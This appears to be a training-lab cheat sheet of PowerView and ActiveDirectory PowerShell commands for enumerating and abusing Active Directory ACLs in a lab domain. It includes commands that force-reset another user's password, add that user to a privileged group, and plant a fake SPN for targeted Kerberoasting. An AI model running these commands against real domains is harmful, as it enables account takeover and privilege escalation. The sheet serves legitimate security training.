ACL Enumeration & Tactics
1. Find Object ACLs in Windows Domain
Command:
Find-InterestingDomainAclDescription: Used to find object ACLs in the target Windows domain with modification rights set to non-built-in objects from a Windows-based host.
2. Import PowerView and Retrieve User SID
Command:
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wleyDescription: Used to import PowerView and retrieve the SID of a specific user account (
wley) from a Windows-based host.
3. Find Domain Objects a User Has Rights Over
Command:
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}Description: Used to find all Windows domain objects that the user has rights over by mapping the user's SID to the
SecurityIdentifierproperty.
4. Perform Reverse Search & Map GUID
Command:
$guid= "00299570-246d-11d0-a768-00aa006e0529"
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | flDescription: Used to perform a reverse search & map to a GUID value from a Windows-based host.
5. Discover Domain Object ACL Based on GUID
Command:
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}Description: Used to discover a domain object's ACL by performing a search based on GUIDs (
-ResolveGUIDs).
6. Discover User Accounts in Domain & Save to File
Command:
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txtDescription: Used to discover a group of user accounts in a target Windows domain and add the output to a text file (
ad_users.txt).
7. Retrieve ACL Information for Each Domain User
Command:
foreach($line in [System.IO.File]::ReadLines("C:\Users\htbstudent\Desktop\ad_users.txt")) {
get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}
}Description: Loops through the list of domain users from
ad_users.txt, retrieves their ACL information, and filters results forINLANEFREIGHT\wley.
8. Create a PSCredential Object
Command:
$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)Description: Used to create a
PSCredentialobject.
9. Create a SecureString Object
Command:
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -ForceDescription: Used to create a
SecureStringobject.
10. Change a User’s Password
Command:
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -VerboseDescription: PowerView command to change the password of a specific user (
damundsen) on a target Windows domain.
11. View Members of a Security Group
Command:
Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty MembersDescription: Used to view the members of a target security group (
Help Desk Level 1).
12. Add a User to a Security Group
Command:
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -VerboseDescription: Adds a specific user (
damundsen) to a security group (Help Desk Level 1).
13. View Only Usernames of Security Group Members
Command:
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberNameDescription: Retrieves the members of
Help Desk Level 1security group, displaying only their usernames.
14. Create a Fake Service Principal Name (SPN)
Command:
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -VerboseDescription: Creates a fake Service Principal Name for a specific user (
adunn).
15. Remove a Fake Service Principal Name (SPN)
Command:
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -VerboseDescription: Removes a previously created fake Service Principal Name.
16. Remove a User from a Security Group
Command:
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -VerboseDescription: Removes a specific user (
damundsen) from the security groupHelp Desk Level 1.
17. Convert an SDDL String into Readable Format
Command:
ConvertFrom-SddlStringDescription: PowerShell cmdlet used to convert an SDDL string into a readable format.
Last updated